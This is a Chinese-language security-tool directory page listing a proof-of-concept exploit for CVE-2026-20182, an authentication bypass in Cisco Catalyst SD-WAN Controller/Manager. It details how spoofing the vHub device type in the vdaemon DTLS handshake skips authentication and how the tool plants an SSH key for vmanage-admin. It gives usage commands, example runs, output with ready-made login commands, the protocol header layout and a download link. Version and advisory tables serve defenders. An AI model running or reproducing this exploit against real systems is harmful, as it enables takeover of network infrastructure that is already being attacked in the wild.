Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过 (CVSS 10.0) | Kitploit
工具/GitHubGitHub/portbuster1337/cve-2026-20182
漏洞利用框架漏洞分析漏洞利用网络安全渗透测试云安全身份验证红队
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过 (CVSS 10.0)

查看仓库
333个月前尚未审核
网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过

CVE-2026-20182 的概念验证利用程序,该漏洞是 Cisco Catalyst SD-WAN Controller (vSmart) 与 Manager (vManage) 上 vdaemon DTLS 服务(UDP/12346)中的一个严重(CVSS 10.0)身份验证绕过漏洞。

披露时间: 2026 年 5 月 14 日,Rapid7(Stephen Fewer & Jonah Burgess) CISA KEV: 2026 年 5 月 14 日添加(紧急指令 26-03) CVSS: 10.0 — CWE-287:身份验证不当

漏洞

vdaemon 服务使用多阶段 DTLS 握手来验证控制平面对等节点。vbond_proc_challenge_ack() 函数实现了特定于设备类型的证书验证——但设备类型 2(vHub)没有验证代码路径。发送带有 device_type=2 的 CHALLENGE_ACK 会导致该函数穿过所有条件检查并无条件地设置 peer->authenticated = 1。

无需有效凭据、无需 CA 签名的证书,也无需了解 SD-WAN 部署的相关信息。

漏洞利用程序的作用

  1. 与目标的 vdaemon 服务(UDP/12346)建立 DTLS 1.2 连接
  2. 接收 CHALLENGE 消息(msg_type=8)
  3. 发送声称是 vHub(device_type=2)的 CHALLENGE_ACK → 对等节点被标记为已认证
  4. 发送 HELLO(msg_type=5)→ 对等节点转换为 UP 状态
  5. 通过 MSG_VMANAGE_TO_PEER(msg_type=14)将 SSH 公钥注入到 /home/vmanage-admin/.ssh/authorized_keys
  • 以 vmanage-admin 身份授予 NETCONF 访问权限(SSH TCP/830)或 SSH 访问权限(TCP/22)
  • 用法

    root@kitploit:~
    python3 cve-2026-20182.py -t <target> [options]
    

    选项

    参数说明
    -t, --target目标 IP 或主机名
    --portvdaemon UDP 端口(默认:12346)
    --key-file要注入的现有 SSH 公钥的路径(可选)
    --netconf通过 SSH 连接 NETCONF 以验证利用是否成功

    示例

    root@kitploit:~
    # Generate a fresh key pair and exploit
    python3 cve-2026-20182.py -t 192.168.1.100
    
    # Use an existing public key
    python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
    
    # Exploit and verify via NETCONF
    python3 cve-2026-20182.py -t 192.168.1.100 --netconf
    

    输出

    root@kitploit:~
    [*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
    [+] DTLS handshake complete (received msg_type=8, 1027 bytes)
    [*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
    [+] peer->authenticated = 1 (authentication bypassed!)
    [*] Sending HELLO ...
    [+] Peer is UP state (peering handshake bypass successful)
    [*] Injecting SSH public key ...
    
    [+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
    [+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
    

    受影响版本

    版本修复版本
    < 20.9迁移到受支持的版本
    20.920.9.9.1
    20.1020.12.7.1
    20.1120.12.7.1
    20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
    20.1320.15.5.2
    20.1420.15.5.2
    20.1520.15.4.4 / 20.15.5.2
    20.1620.18.2.2
    20.1820.18.2.2
    26.1.126.1.1.1

    研究参考资料

    • Rapid7(原始披露): CVE-2026-20182:Cisco Catalyst SD-WAN Controller 中的严重身份验证绕过 — Stephen Fewer 与 Jonah Burgess 提供的完整技术分析、反编译代码及协议细节
    • Cisco 安全公告: cisco-sa-sdwan-rpa2-v69WY2SW — 提供修复版本信息的厂商公告
    • CISA KEV: CVE-2026-20182 — 紧急指令 26-03(须在 2026 年 5 月 17 日前完成修复)
    • NVD: CVE-2026-20182 — 美国国家漏洞数据库条目
    • Rapid7 Metasploit 模块: cisco_sdwan_vhub_auth_bypass — Metasploit 框架中的辅助模块
    • BleepingComputer: Cisco 警告称新的严重 SD-WAN 漏洞遭到零日攻击利用
    • Tenable: 关于 Cisco SD-WAN 漏洞持续遭到利用的常见问题解答
    • Cisco Talos: 威胁行为者 UAT-8616 被认定在野利用此漏洞

    技术细节

    vdaemon 协议头为 12 字节:

    偏移大小字段说明
    01msg_type低半字节 = 类型,高半字节 = 版本
    11device_info高半字节 = device_type,低半字节 = 标志
    21flags标准值 0xA0
    31padding始终为 0x00
    4-74domain_id大端序 uint32
    8-114site_id大端序 uint32

    设备类型:1=vEdge、2=vHub、3=vSmart、4=vBond、5=vManage

    环境要求

    • Python 3.7+
    • openssl 命令行工具(用于 DTLS 传输)
    • cryptography 库(pip install cryptography)

    免责声明

    本漏洞利用程序仅限用于经授权的红队行动、渗透测试,以及在您拥有明确书面授权的系统上进行安全研究。未经授权使用属违法行为。

    下载工具